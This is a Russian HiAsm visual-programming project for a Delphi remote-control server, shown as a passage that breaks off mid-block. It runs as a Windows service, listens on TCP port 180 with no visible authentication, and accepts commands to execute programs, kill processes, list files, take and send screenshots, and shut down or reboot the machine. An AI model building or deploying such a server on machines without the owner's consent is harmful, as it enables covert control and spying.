*Автор: Sniper36#13#10E-mail: Sniper36@sibnet.ru#13#10-------------------------------------------#13#10Сервер для удаленного управления компьютером
Make(delphi)
ver(4.05 build 186)
Add(Service,4630569,21,126)
{
 Wait=0
 link(onStart,1319006:doCreateMutex,[])
 link(onStop,1319006:doReleaseMutex,[])
}
Add(TCP_Server,5257400,133,133)
{
 Port=180
 link(onRead,810799:doWork1,[])
 link(onConnect,13697919:doStrCat,[(186,146)(186,153)])
 link(onDisconnect,7048211:doData,[(175,153)(175,258)])
}
Add(Hub,11689922,315,140)
{
 InCount=3
 OutCount=1
 link(onEvent1,12185193:In,[])
}
Add(MultiElementEx,13697919,196,147)
{
 link(onStrCat,11689922:doEvent2,[])
}
BEGIN_SDK
  Add(EditMultiEx,12092473,3,3)
  {
   WorkCount=#8:doStrCat|
   EventCount=#8:onStrCat|
   Width=258
   Height=179
   link(doStrCat,3097979:doEvent1,[(12,9)(12,90)])
  }
  Add(ComputerInfo,2544099,140,28)
  {
   Mask="Type: x%t"
  }
  Add(StrCat,8815595,140,84)
  {
   Str1="Started on "
   link(onStrCat,12092473:onStrCat,[(227,90)(227,9)])
   link(Str2,2544099:CompName,[])
  }
  Add(GlobalVar,8982561,133,126)
  {
   Name="TCP-Connected"
  }
  Add(Hub,3097979,21,84)
  {
   link(onEvent1,8815595:doStrCat,[])
   link(onEvent2,7048211:doData,[(69,97)(69,132)])
  }
  Add(DoData,7048211,84,126)
  {
   Data=Integer(1)
   link(onEventData,8982561:doValue,[])
  }
END_SDK
Add(HubEx,10984169,119,84)
{
 Angle=2
 link(onEvent,4630569:doStop,[(9,90)(9,132)])
}
Add(LineBreak,1516706,42,175)
{
 Caption="TCP-Send"
 link(Out,5257400:doSend,[(119,181)(119,153)])
 Primary=[12185193,315,-35]
}
Add(MultiElementEx,1319006,70,126)
{
 link(onAlreadyExists,10984169:doWork3,[(123,132)])
 link(onCreated,5257400:doOpen,[])
 link(onReleased,5257400:doClose,[])
}
BEGIN_SDK
  Add(EditMultiEx,3964122,3,3)
  {
   WorkCount=#13:doCreateMutex|14:doReleaseMutex|
   EventCount=#15:onAlreadyExists|9:onCreated|10:onReleased|
   link(doCreateMutex,4067744:doCreateMutex,[(47,9)(47,104)])
   link(doReleaseMutex,4067744:doReleaseMutex,[(47,16)(47,118)])
  }
  Add(Mutex,4067744,91,98)
  {
   Name="RAdmin"
   link(onCreated,3964122:onCreated,[(213,104)(213,16)])
   link(onAlreadyExists,3964122:onAlreadyExists,[(213,111)(213,9)])
   link(onReleased,3964122:onReleased,[(213,118)(213,23)])
  }
END_SDK
Add(MultiElement,810799,266,133)
{
 link(onEvent1,10984169:doWork2,[(310,139)(310,90)])
 link(onEvent2,11689922:doEvent1,[])
}
BEGIN_SDK
  Add(EditMulti,1564805,73,21)
  {
   EventCount=2
   WorkCount=1
   Width=447
   Height=361
   link(doWork1,3404427:doValue,[(91,27)(91,146)])
  }
  Add(StrList,2476971,262,35)
  {
   Strings=#5:about|4:info|4:help|4:proc|6:reboot|8:shutdown|9:hibernate|6:logoff|6:exec *|6:text *|5:sshot|2:cd|2:ls|6:kill *|4:exit|
  }
  Add(Memory,3404427,101,140)
  {
   link(onData,551597:doFor,[])
  }
  Add(MultiElementEx,1782614,318,224)
  {
   link(onStrCat,8193886:doEvent1,[])
   link(Str2,5676976:Var3,[(324,205)])
  }
  BEGIN_SDK
    Add(EditMultiEx,9364704,24,7)
    {
     WorkCount=#8:doStrCat|9:doStrCat1|9:doStrCat2|8:doEvent1|6:doData|6:doEnum|8:doReboot|10:doShutdown|11:doHibernate|7:doTimer|8:doLogOff|8:doSearch|9:doCapture|2:cd|
     EventCount=#8:onStrCat|
     DataCount=#4:Str2|
     Width=594
     Height=396
     link(doStrCat,16375290:doStrCat,[(64,13)(64,125)])
     link(doStrCat1,763589:doEvent1,[(86,20)(86,132)])
     link(doStrCat2,15226565:doData,[(106,27)(106,139)])
     link(doEvent1,4119803:doEnum,[(124,34)(124,146)])
     link(doData,9571425:doReboot,[(145,41)(145,153)])
     link(doEnum,9571425:doHibernate,[(145,48)(145,160)])
     link(doReboot,9571425:doShutdown,[(145,55)(145,167)])
     link(doShutdown,9571425:doLogOff,[(145,62)(145,174)])
     link(doHibernate,10974458:doTimer,[(162,69)(162,160)])
     link(doTimer,16241174:doSearch,[(180,76)(180,167)])
     link(doLogOff,5055621:doCapture,[(201,83)(201,174)])
     link(doSearch,6253706:doSearch,[(222,90)(222,181)])
     link(doCapture,6253706:doSearch1,[(222,97)(222,188)])
     link(cd,207269:doSearch,[(246,104)(246,195)])
    }
    Add(StrCat,16375290,84,119)
    {
     Str2="\n\r===========About===========\n\rAuthor=Sniper\n\rSupport=Sniper@xaker.ru\n\rVersion=1.0\n\rNow working on cmd shell\n\rPROJECT CLOSED.\n\r========endAbout===========\n\r"
     link(onStrCat,3202057:doEvent1,[])
    }
    Add(MultiElementEx,763589,126,126)
    {
     link(onEvent1,3202057:doEvent2,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,5172056,3,-5)
      {
       WorkCount=#8:doEvent1|
       EventCount=#8:onEvent1|
       Width=426
       Height=333
       link(doEvent1,7296440:doEvent1,[(15,1)(15,173)])
      }
      Add(ComputerInfo,477724,77,90)
      {
       Mask="CPUType: x%t "
      }
      Add(Hub,7296440,28,167)
      {
       OutCount=6
       link(onEvent1,8617751:Refresh,[(82,173)(82,61)])
       link(onEvent2,1405488:doEnum,[(135,180)(135,90)])
       link(onEvent4,245300:doString,[])
       link(onEvent5,3924683:doData,[(215,201)(215,201)])
       link(onEvent6,1405488:doClear,[(157,208)(157,97)])
      }
      Add(StrList,8599772,371,140)
      {
      }
      Add(FormatStr,245300,77,188)
      {
       DataCount=9
       Mask="\n\r===========Info===========\n\rUserName=%1\n\rMachineName=%2\n\r%3\n\r%9RAM: %6/%5 MB\n\rPageFile:%8/%7 MB\n\r========endInfo===========\n\r"
       link(onFString,16483996:doWork3,[(263,194)])
       link(Str1,477724:UserName,[])
       link(Str2,477724:CompName,[])
       link(Str3,477724:CPU,[])
       link(Str5,8617751:RAM,[])
       link(Str6,8617751:RAM_free,[])
       link(Str7,8617751:PageFile,[])
       link(Str8,8617751:PageFile_free,[])
       link(Str9,1405488:Text,[(139,152)(209,152)])
      }
      Add(MemoryStatus,8617751,105,55)
      {
       Scale=2
      }
      Add(DoData,3924683,371,195)
      {
       link(onEventData,5172056:onEvent1,[(412,201)(412,1)])
       link(Data,8599772:Text,[])
      }
      Add(HubEx,16483996,259,161)
      {
       link(onEvent,8599772:doText,[])
      }
      Add(MultiElementEx,1405488,203,84)
      {
       link(onEventData,16483996:doWork1,[(263,90)])
      }
      BEGIN_SDK
        Add(EditMultiEx,4026413,3,3)
        {
         WorkCount=#6:doEnum|7:doClear|
         EventCount=#11:onEventData|
         VarCount=#4:Text|
         Width=384
         Height=284
         link(doEnum,5106108:doEnum,[(26,9)(26,97)])
         link(doClear,814061:doClear,[(162,16)(162,27)])
         link(Text,814061:Text,[(9,173)(342,173)])
        }
        Add(Registry,11662152,105,105)
        {
         HKey=2
         Key="SOFTWARE\Microsoft\Windows NT\CurrentVersion"
         Value="BuildLab"
         link(onRead,11085247:doValue,[(180,111)(180,20)])
         link(Value,5106108:Item,[(125,95)(93,95)(93,147)(55,147)])
        }
        Add(ArrayEnum,5106108,49,91)
        {
         link(onItem,11662152:doRead,[(93,97)(93,111)])
         link(Array,14664363:Array,[(55,68)(125,68)])
        }
        Add(StrList,14664363,105,6)
        {
         Strings=#8:BuildLab|9:ProductId|11:ProductName|
        }
        Add(StrCat,13469478,217,112)
        {
         Str1="Label: "
         link(onStrCat,11054126:doEvent1,[(268,118)(268,153)])
         link(Str2,16597789:Data1,[])
        }
        Add(If_else,9064249,154,112)
        {
         Op2=Integer(0)
         link(onTrue,13469478:doStrCat,[])
         link(onFalse,4494551:doCompare,[(203,125)(203,149)(151,149)(151,160)])
         link(Op1,12683257:Data1,[(160,100)(160,100)])
        }
        Add(If_else,4494551,161,154)
        {
         Op2=Integer(1)
         link(onTrue,5555278:doStrCat,[])
         link(onFalse,8588367:doCompare,[(203,167)(203,191)(151,191)(151,202)])
         link(Op1,12683257:Data2,[(167,121)(167,121)])
        }
        Add(If_else,8588367,168,196)
        {
         Op2=Integer(2)
         link(onTrue,7016022:doStrCat,[])
         link(Op1,12683257:Data3,[(174,142)(174,142)])
        }
        Add(StrCat,5555278,224,154)
        {
         Str1="ID: "
         link(onStrCat,11054126:doEvent2,[])
         link(Str2,16597789:Data2,[])
        }
        Add(StrCat,7016022,231,196)
        {
         Str1="OS:"
         link(onStrCat,11054126:doEvent3,[(275,202)(275,167)])
         link(Str2,16597789:Data3,[])
        }
        Add(Hub,11054126,287,147)
        {
         InCount=4
         OutCount=1
         link(onEvent1,814061:doAdd,[(327,153)(327,20)])
        }
        Add(StrList,814061,336,14)
        {
        }
        Add(GetData,12683257,154,56)
        {
         Count=3
         link(Data,5106108:Index,[(160,46)(118,46)(118,133)(62,133)])
        }
        Add(GetData,16597789,224,56)
        {
         Count=3
         link(Data,11085247:Value,[])
        }
        Add(Memory,11085247,224,14)
        {
         link(onData,9064249:doCompare,[(266,20)(266,79)(144,79)(144,118)])
        }
      END_SDK
    END_SDK
    Add(Hub,3202057,532,119)
    {
     InCount=12
     OutCount=1
     link(onEvent1,9364704:onStrCat,[(591,125)(591,13)])
    }
    Add(MultiElementEx,15226565,168,133)
    {
     link(onEventData,3202057:doEvent3,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,5812100,3,3)
      {
       WorkCount=#6:doData|
       EventCount=#11:onEventData|
       link(doData,10043367:doData,[(36,9)(36,104)])
      }
      Add(StrList,5244649,70,35)
      {
       Strings=#0:|26:===========Help===========|10:>Commands:|21:>Exit-ShutDown Server|46:>Info-info about machine where launched Server|18:>About-About autor|43:>Proc-List processes on machine and show ID|22:>Reboot-Reboot machine|26:>Shutdown-shutdown machine|28:>Hibernate-hibernate windows|20:>LogOff-Log Off user|56:>Exec *.exe-Execute your program example:"exec explorer"|52:>Text your text-Write your text on display(x=50,y=0)|21:>Sshot-Do ScreenShoot|37:>cd-ChangeDirectory(cd windows)(beta)|49:>ls-list all files and folders in directory(beta)|26:>kill process ID(see proc)|15:>Help-This text|26:========endHelp===========|
      }
      Add(DoData,10043367,70,98)
      {
       link(onEventData,5812100:onEventData,[(202,104)(202,9)])
       link(Data,5244649:Text,[])
      }
    END_SDK
    Add(MultiElementEx,4119803,210,140)
    {
     link(onEventData,3202057:doEvent4,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,2675399,3,3)
      {
       WorkCount=#6:doEnum|
       EventCount=#11:onEventData|
       Width=391
       Height=207
       link(doEnum,15530115:doEnum,[(12,9)(12,160)])
      }
      Add(WinEnum,15530115,21,154)
      {
       VisibleOnly=1
       link(onFindWindow,15504154:doCompare,[(65,160)(65,153)])
       link(onEndEnum,656119:doData,[])
      }
      Add(StrCat,2522684,329,161)
      {
       Str2="========endProcesses===========\n\r"
       link(onStrCat,2675399:onEventData,[(370,167)(370,9)])
      }
      Add(StrCat,16442721,287,161)
      {
       Str1="\n\r===========Processes===========\n\r"
       link(onStrCat,2522684:doStrCat,[])
      }
      Add(Hub,8247074,238,161)
      {
       link(onEvent1,16442721:doStrCat,[])
       link(onEvent2,6840517:doClear,[(282,174)(282,128)(177,128)(177,83)])
      }
      Add(StrList,6840517,189,70)
      {
      }
      Add(DoData,656119,189,161)
      {
       link(onEventData,8247074:doEvent1,[])
       link(Data,6840517:Text,[])
      }
      Add(FormatStr,8450728,126,154)
      {
       Mask="%1(%2)"
       link(onFString,6840517:doAdd,[(174,160)(174,76)])
       link(Str2,15530115:Handle,[(139,127)(65,127)(65,196)(27,196)])
      }
      Add(If_else,15504154,77,147)
      {
       Op2=String()
       link(onFalse,8450728:doString,[])
      }
    END_SDK
    Add(MultiElementEx,4526352,469,224)
    {
     link(onUsage,3202057:doEvent12,[(517,230)(517,202)])
    }
    BEGIN_SDK
      Add(EditMultiEx,4433644,3,3)
      {
       EventCount=#7:onUsage|
       Width=391
       Height=319
      }
      Add(CPUUsage,14860028,182,119)
      {
       link(onUsage,1995156:doStrCat,[])
      }
      Add(Timer,8422072,21,119)
      {
       link(onTimer,8377347:doCompare,[])
      }
      Add(StrCat,1995156,231,119)
      {
       Str1="$$"
       link(onStrCat,16304337:doEvent1,[])
      }
      Add(Hub,2751806,133,119)
      {
       link(onEvent1,14860028:doCollectCPUData,[])
       link(onEvent2,13260188:doStrCat,[])
      }
      Add(WinTools,9392610,280,70)
      {
       link(Handle,3014968:GetActiveWindow,[])
      }
      Add(WinEnum,3014968,273,28)
      {
       Point(GetActiveWindow)
      }
      Add(StrCat,13260188,273,126)
      {
       Str1="$A"
       link(onStrCat,16304337:doEvent2,[])
       link(Str2,9392610:CaptionText,[])
      }
      Add(Hub,16304337,336,119)
      {
       InCount=2
       OutCount=1
       link(onEvent1,4433644:onUsage,[(374,125)(374,9)])
      }
      Add(If_else,8377347,70,119)
      {
       Type=5
       Op2=Integer(0)
       link(onTrue,2751806:doEvent1,[])
       link(Op1,8982561:Var,[])
      }
      Add(GlobalVar,8982561,70,77)
      {
       Name="TCP-Connected"
       Data=Integer(0)
      }
    END_SDK
    Add(MultiElementEx,9571425,252,147)
    {
     link(onEvent1,3202057:doEvent5,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,1414162,3,3)
      {
       WorkCount=#8:doReboot|11:doHibernate|10:doShutdown|8:doLogOff|
       EventCount=#8:onEvent1|
       Width=356
       link(doReboot,13270104:doEvent1,[(61,9)(61,41)])
       link(doHibernate,4504490:doEvent1,[(61,16)(61,118)])
       link(doShutdown,13800442:doEvent1,[(61,23)(61,76)])
       link(doLogOff,10066763:doEvent1,[(61,30)(61,153)])
      }
      Add(ExitWindows,9526758,175,98)
      {
       Point(doHibernate)
       Point(doLogOff)
      }
      Add(Hub,13270104,98,35)
      {
       link(onEvent1,10391804:doEvent1,[(204,41)(204,83)])
       link(onEvent2,9526758:doReboot,[(149,48)(149,104)])
      }
      Add(Hub,13800442,91,70)
      {
       link(onEvent1,10391804:doEvent2,[(188,76)(188,90)])
       link(onEvent2,9526758:doShutdown,[(142,83)(142,111)])
      }
      Add(Hub,4504490,91,112)
      {
       link(onEvent1,10391804:doEvent3,[(163,97)])
       link(onEvent2,9526758:doHibernate,[])
      }
      Add(Hub,10066763,91,147)
      {
       link(onEvent1,10391804:doEvent4,[(228,153)(228,104)])
       link(onEvent2,9526758:doLogOff,[(149,160)(149,132)])
      }
      Add(Hub,10391804,245,77)
      {
       InCount=4
       link(onEvent1,321619:doData,[])
      }
      Add(DoData,321619,287,77)
      {
       Data=String(Done.)
       link(onEventData,1414162:onEvent1,[(339,83)(339,9)])
      }
    END_SDK
    Add(MultiElementEx,10974458,287,154)
    {
     link(onCapture,3202057:doEvent6,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,7638568,3,3)
      {
       WorkCount=#7:doTimer|
       EventCount=#9:onCapture|
       Width=251
       link(doTimer,4950343:doDelete,[(29,9)(29,62)])
      }
      Add(Hub,10151150,77,56)
      {
       link(onEvent1,8834538:doValue,[(149,62)(149,13)])
       link(onEvent2,263387:doExec,[])
      }
      Add(Delete,4950343,35,56)
      {
       Count=5
       link(onDelete,10151150:doEvent1,[])
      }
      Add(Memory,8834538,189,7)
      {
       Default=String()
      }
      Add(WinExec,263387,133,63)
      {
       link(onExec,8557085:doString,[])
      }
      Add(FormatStr,8557085,189,63)
      {
       DataCount=1
       Mask="\n\r======================\n\r"%1" Done.\n\r======================\n\r"
       link(onFString,7638568:onCapture,[(237,69)(237,9)])
       link(Str1,8834538:Value,[])
      }
    END_SDK
    Add(MultiElementEx,16241174,329,161)
    {
     @Hint=#4:Text|
     link(onEvent2,3202057:doEvent7,[])
     link(Text,16168391:Data1,[(335,114)(237,114)])
    }
    BEGIN_SDK
      Add(EditMultiEx,3606977,3,3)
      {
       WorkCount=#8:doSearch|
       EventCount=#8:onEvent2|
       DataCount=#4:Text|
       Width=419
       link(doSearch,307690:doDelete,[(26,9)(26,132)])
      }
      Add(Delete,307690,35,126)
      {
       Count=5
       link(onDelete,12345900:doValue,[])
       link(Str,3606977:Text,[(41,23)(9,23)])
      }
      Add(Img_Text,10007188,133,126)
      {
       X=50
       DrawSource=1
       Font=[MS Sans Serif,15,0,65280,1]
       Point(Y)
       link(onDraw,9618707:doEvent1,[])
       link(Text,12345900:Value,[(146,114)(118,114)(118,170)(83,170)])
       link(Y,14017240:Count,[(153,114)(202,114)(202,170)(321,170)])
      }
      Add(Memory,12345900,77,126)
      {
       Default=String()
       link(onData,10007188:doDraw,[])
      }
      Add(Counter,14017240,315,126)
      {
       Max=17
       Step=17
       Point(doMax)
       link(onNext,1951864:doData,[])
      }
      Add(DoData,1951864,364,126)
      {
       Data=String(Done)
       link(onEventData,3606977:onEvent2,[(402,132)(402,9)])
      }
      Add(Screen,9302218,245,42)
      {
       EnumMask="%vx"
      }
      Add(Hub,9618707,182,126)
      {
       link(onEvent1,14017240:doNext,[])
       link(onEvent2,14151171:doData,[])
      }
      Add(DoData,14151171,252,133)
      {
       link(onEventData,14017240:doMax,[(300,139)(300,153)])
       link(Data,9302218:Height,[])
      }
    END_SDK
    Add(MultiElementEx,5055621,378,168)
    {
     @Hint=#10:SCREENSHOT|
     link(onEventData,3202057:doEvent8,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,1734761,3,3)
      {
       WorkCount=#9:doCapture|8:doEvent1|
       EventCount=#11:onEventData|
       Width=598
       Height=312
       link(doCapture,3028048:doEvent1,[(5,9)(5,167)])
      }
      Add(ScreenShort,10999974,119,168)
      {
       link(onCapture,56102:doEvent1,[])
      }
      Add(BitmapStream,23496,224,161)
      {
       link(Stream,7073567:Var2,[])
      }
      Add(TCP_Server,12800475,336,161)
      {
       Port=182
       DataType=3
       link(onConnect,8916906:doData,[])
       link(onDisconnect,15962760:doData,[])
      }
      Add(DoData,14523757,273,175)
      {
       link(onEventData,12800475:doSend,[])
       link(Data,7073567:Var3,[(279,121)])
      }
      Add(If_else,14327382,70,161)
      {
       Op2=Integer(0)
       link(onTrue,12800475:doOpen,[(158,151)(288,151)])
       link(onFalse,10999974:doCapture,[])
       link(Op1,5623535:Var,[])
      }
      Add(Hub,56102,161,168)
      {
       OutCount=4
       link(onEvent1,23496:doWrite,[])
       link(onEvent2,14523757:doData,[])
       link(onEvent3,93822:doCopy,[(202,188)(202,76)])
       link(onEvent4,93822:doClear,[(209,195)(209,83)])
      }
      Add(MemoryStream,93822,224,70)
      {
      }
      Add(Hub,3028048,14,161)
      {
       link(onEvent1,14327382:doCompare,[])
       link(onEvent2,11098230:doData,[(58,174)(58,272)])
      }
      Add(DoData,11098230,378,266)
      {
       Data=String(!#sshot)
       link(onEventData,1734761:onEventData,[(506,272)(506,9)])
      }
      Add(GlobalVar,11987544,490,168)
      {
       Name="TCP2-Connected"
      }
      Add(DoData,8916906,385,168)
      {
       Data=Integer(1)
       link(onEventData,1907248:doWork2,[])
      }
      Add(DoData,15962760,427,175)
      {
       Data=Integer(0)
       link(onEventData,1907248:doWork3,[(473,181)])
      }
      Add(HubEx,1907248,469,168)
      {
       link(onEvent,11987544:doValue,[])
      }
      Add(GetDataEx,7073567,224,116)
      {
       link(Data,93822:Stream,[])
      }
      Add(GlobalVar,5623535,70,105)
      {
       Name="TCP2-Connected"
       Data=Integer(0)
      }
    END_SDK
    Add(MultiElementEx,6253706,420,175)
    {
     @Hint=#3:bug|
     link(onSearch,3202057:doEvent9,[])
     link(onSearch1,3202057:doEvent10,[])
    }
    BEGIN_SDK
      Add(EditMultiEx,92330,3,3)
      {
       WorkCount=#8:doSearch|9:doSearch1|
       EventCount=#8:onSearch|9:onSearch1|
       Width=391
       Height=291
       link(doSearch,13810877:doReplace,[])
       link(doSearch1,16095980:doSearch,[(47,16)(47,111)])
      }
      Add(FileSearch,16095980,91,105)
      {
       Dir="-"
       SubDir=1
       FullName=1
       Include=2
       link(onSearch,10273696:doOperation,[])
       link(onEndSearch,13572281:doOperation,[(133,118)(133,159)(88,159)(88,188)])
       link(Dir,7728773:Data1,[])
      }
      Add(Math,13572281,98,182)
      {
       OpType=3
       Op2=1000048
       ResultType=0
       link(onResult,3807177:doString,[(140,188)(140,219)(81,219)(81,230)])
       link(Op1,10273696:Data2,[(104,149)(167,149)])
      }
      Add(MultiElementEx,13810877,98,3)
      {
       link(onFalse,92330:onSearch,[])
      }
      BEGIN_SDK
        Add(EditMultiEx,12288401,21,15)
        {
         WorkCount=#9:doReplace|
         EventCount=#7:onFalse|
         VarCount=#5:Value|
         Width=524
         Height=298
         link(doReplace,15536815:doCompare,[(30,21)(30,41)])
        }
        Add(StrCat,13765473,452,215)
        {
         Str1="Now directory is "
        }
        Add(DirTools,12882376,74,201)
        {
         Point(doExists)
        }
        Add(FormatStr,2540331,452,166)
        {
         DataCount=1
         Mask="Folder "%1" not exits"
        }
        Add(MultiElementEx,5902825,269,42)
        {
         link(onSplit,1872905:doEvent1,[])
         link(Str,5183991:Var,[(275,35)(275,35)])
        }
        BEGIN_SDK
          Add(EditMultiEx,1313960,3,40)
          {
           WorkCount=#9:doCompare|
           EventCount=#7:onSplit|
           VarCount=#5:Value|
           DataCount=#3:Str|
           Width=489
           Height=291
           link(doCompare,3762158:Разделить строку,[(96,46)(96,120)])
          }
          Add(Math,12771827,161,259)
          {
           Op2=1
           link(onResult,11365811:doDelete,[(299,265)(299,218)])
           link(Op1,9884267:Result,[])
          }
          Add(MultiElementEx,3762158,126,114)
          {
           @Hint=#13:StrPart<-----|
           link(Правая часть,4637798:doEvent1,[(170,120)(170,120)])
           link(Str,5020548:Var3,[(132,81)])
           link(Char,11783089:Value,[])
          }
          BEGIN_SDK
            Add(EditMultiEx,5458670,3,3)
            {
             WorkCount=#16:Разделить строку|
             EventCount=#12:Правая часть|11:Левая часть|17:Строка не найдена|
             VarCount=#30:Содержит левую часть выражения|31:Содержит правую часть выражения|
             DataCount=#3:Str|4:Char|
             Width=689
             Height=536
             link(Разделить строку,4537576:doData,[(54,9)(54,90)])
             link(Содержит левую часть выражения,10925963:Value,[(9,475)(454,475)])
             link(Содержит правую часть выражения,8486299:Value,[(16,513)(454,513)])
            }
            Add(Copy,9078023,273,378)
            {
             Position=1
             link(onCopy,10925963:doValue,[(376,384)(376,384)])
             link(Str,10157679:Data3,[(279,196)(265,196)])
             link(Count,9698522:Result,[(293,369)(244,369)(244,421)(188,421)])
            }
            Add(Length,14861036,182,231)
            {
             link(onLength,6219440:doFor,[])
             link(Str,10157679:Data1,[(188,206)(251,206)])
            }
            Add(GetData,10157679,245,147)
            {
             Count=4
             link(Data,11775360:Value,[])
            }
            Add(Copy,13495036,329,231)
            {
             Count=1
             link(onCopy,5779768:doCompare,[])
             link(Str,10157679:Data2,[(335,206)(258,206)])
             link(Position,2464902:Data2,[(342,222)(310,222)(310,330)(272,330)])
             link(Count,7792979:Data1,[])
            }
            Add(Memory,11775360,245,84)
            {
            }
            Add(DoData,4537576,105,84)
            {
             link(onEventData,10102806:doEvent1,[])
             link(Data,5458670:Str,[(111,44)(9,44)])
            }
            Add(Hub,10102806,182,84)
            {
             InCount=2
             OutCount=3
             link(onEvent1,11775360:doValue,[])
             link(onEvent2,8794222:doLength,[(233,97)(233,41)])
             link(onEvent3,14861036:doLength,[(224,104)(224,174)(172,174)(172,237)])
            }
            Add(For,6219440,259,231)
            {
             Start=1
             End=1
             Step=-1
             link(onEvent,13495036:doCopy,[])
             link(onStop,5458670:Строка не найдена,[(493,244)(493,23)])
             link(Start,9192826:Data2,[(265,222)(237,222)(237,330)(195,330)])
            }
            Add(If_else,5779768,420,231)
            {
             link(onTrue,7552550:doEvent1,[])
             link(Op2,15015126:Data2,[(433,171)(433,171)])
            }
            Add(GetData,7792979,343,91)
            {
             link(Data,8794222:Result,[])
            }
            Add(Length,8794222,343,35)
            {
             link(Str,15015126:Data1,[(349,26)(397,26)(397,120)(426,120)])
            }
            Add(GetData,15015126,420,77)
            {
             link(Data,5458670:Char,[(426,29)(16,29)])
            }
            Add(Hub,7552550,483,231)
            {
             OutCount=3
             link(onEvent1,6219440:doStop,[(527,237)(527,215)(249,215)(249,244)])
             link(onEvent2,9698522:doOperation,[(525,244)(525,321)(172,321)(172,384)])
             link(onEvent3,6612693:doOperation,[(525,251)(525,360)(179,360)(179,461)])
            }
            Add(Math,9698522,182,378)
            {
             OpType=1
             Op2=1
             link(onResult,9078023:doCopy,[])
             link(Op1,2464902:Data1,[(188,350)(265,350)])
            }
            Add(GetData,9192826,182,287)
            {
             link(Data,14861036:Result,[])
            }
            Add(GetData,2464902,259,287)
            {
             Count=3
             link(Data,6219440:Position,[])
            }
            Add(Copy,13144030,329,455)
            {
             Position=1
             link(onCopy,8486299:doValue,[])
             link(Str,10157679:Data4,[(335,315)(272,315)])
             link(Position,6612693:Result,[(342,446)(275,446)(275,498)(195,498)])
             link(Count,9192826:Data1,[(349,385)(188,385)])
            }
            Add(Math,6612693,189,455)
            {
             Op2=1
             link(onResult,13144030:doCopy,[])
             link(Op1,2464902:Data3,[(195,388)(279,388)])
             link(Op2,7792979:Data2,[(202,290)(356,290)])
            }
            Add(Memory,10925963,448,378)
            {
             link(onData,5458670:Левая часть,[(587,384)(587,16)])
            }
            Add(Memory,8486299,448,455)
            {
             link(onData,5458670:Правая часть,[(566,461)(566,9)])
            }
            Add(Icon,13837989,35,161)
            {
             @Hint=#5:#main|
             Icon=[ZIP360B000078DA636060044229290620506050E066601003B2348018246402C48C4071B02C37C3281805A360148C8251300A46C1281805830AFCFFFFFFC0BD447187BBEBBE1DB8BB4E0C88AF1DB8976FE070FFFDB703EC8FBF1FF8FFF7E7013EC3E803A56FA30F94E8461FE05D1B7D20AFD0FD403E509FFCFFFA0320FD7CDB1F1DF8BAFDD681AF1B1E1DE89D5EE550B33CADA1F67BFD81F60FFFC1F2200C00188047DA]
            }
          END_SDK
          Add(Memory,11783089,133,51)
          {
           Default=String(\)
          }
          Add(Position,8224691,322,156)
          {
           link(onSearch,9884267:doLength,[(364,162)(364,200)(151,200)(151,218)])
           link(Str,5020548:Var2,[(328,121)(111,121)])
           link(Target,5997314:Value,[])
          }
          Add(GetDataEx,5020548,105,76)
          {
           link(Data,1313960:Str,[(111,58)(9,58)])
          }
          Add(DoData,15477554,252,114)
          {
           link(onEventData,8224691:doSearch,[(303,141)(303,162)])
          }
          Add(FormatStr,9002695,182,51)
          {
           DataCount=1
           Mask="\%1"
           link(onFString,5997314:doValue,[])
           link(Str1,8452367:Var3,[(188,41)(233,41)(233,163)])
          }
          Add(Hub,4637798,182,114)
          {
           link(onEvent1,9002695:doString,[(224,120)(224,99)(172,99)(172,57)])
           link(onEvent2,15477554:doData,[(233,127)(233,120)])
          }
          Add(Memory,5997314,329,51)
          {
          }
          Add(Delete,11365811,406,212)
          {
           link(onDelete,1313960:onSplit,[(465,218)(465,46)])
           link(Str,5020548:Var1,[(412,81)])
           link(Position,8224691:Position,[(419,200)(328,200)])
           link(Count,12771827:Result,[(426,202)(300,202)(300,301)(167,301)])
          }
          Add(Length,9884267,161,212)
          {
           link(onLength,12771827:doOperation,[(203,218)(203,251)(151,251)(151,265)])
           link(Str,8452367:Var1,[(167,163)])
          }
          Add(GetDataEx,8452367,175,158)
          {
           link(Data,3762158:Содержит правую часть выражения,[(181,152)(139,152)])
          }
        END_SDK
        Add(StrMask,15536815,61,35)
        {
         Mask="cd *"
         link(onTrue,15652191:doReplace,[])
        }
        Add(GlobalVar,5183991,269,14)
        {
         Name="CDir"
         Data=String(C:)
        }
        Add(Replace,15652191,110,42)
        {
         SubStr="cd "
         link(onReplace,14262499:doValue,[(154,48)(147,48)])
        }
        Add(If_else,1480805,198,42)
        {
         Op2=String(..)
         link(onTrue,5902825:doCompare,[])
         link(onFalse,13710477:doString,[(240,55)(240,103)(198,103)(198,139)])
        }
        Add(FormatStr,13710477,208,133)
        {
         Mask="%2\%1"
         link(onFString,11823060:doEvent1,[(259,139)(259,167)])
         link(Str1,14262499:Value,[(214,104)(158,104)])
         link(Str2,14914601:Var,[])
        }
        Add(GlobalVar,14914601,229,105)
        {
         Name="CDir"
         Data=String(C:)
        }
        Add(Hub,12017755,383,49)
        {
         InCount=2
         link(onEvent2,9847962:doData,[])
        }
        Add(Hub,1872905,320,42)
        {
         link(onEvent1,5183991:doValue,[(362,48)(362,35)(260,35)(260,20)])
         link(onEvent2,12017755:doEvent1,[(395,55)(374,55)])
        }
        Add(DoData,5538195,152,133)
        {
        }
        Add(Memory,14262499,152,42)
        {
         link(onData,1480805:doCompare,[])
        }
        Add(GlobalVar,1903144,292,133)
        {
         Name="CDir"
         Data=String(C:)
        }
        Add(Hub,11823060,278,161)
        {
         link(onEvent1,1903144:doValue,[(320,167)(320,154)(282,154)(282,139)])
         link(onEvent2,12017755:doEvent2,[(374,174)(374,62)])
        }
        Add(DoData,9847962,446,56)
        {
         link(onEventData,12288401:onFalse,[(515,62)(515,21)])
         link(Data,11611917:Var,[])
        }
        Add(GlobalVar,11611917,446,21)
        {
         Name="CDir"
         Data=String(C:)
        }
      END_SDK
      Add(StrList,15456203,259,105)
      {
      }
      Add(DoData,10874608,210,231)
      {
       link(onEventData,2571021:doEvent1,[])
       link(Data,15456203:Text,[(216,173)(265,173)])
      }
      Add(Hub,2571021,259,231)
      {
       link(onEvent1,92330:onSearch1,[(342,237)(342,16)])
       link(onEvent2,15456203:doClear,[(301,244)(301,173)(249,173)(249,118)])
      }
      Add(FormatStr,3807177,91,224)
      {
       DataCount=3
       Mask="Total %1 Files, %2 MBytes in %3."
       link(onFString,14640254:doEvent1,[])
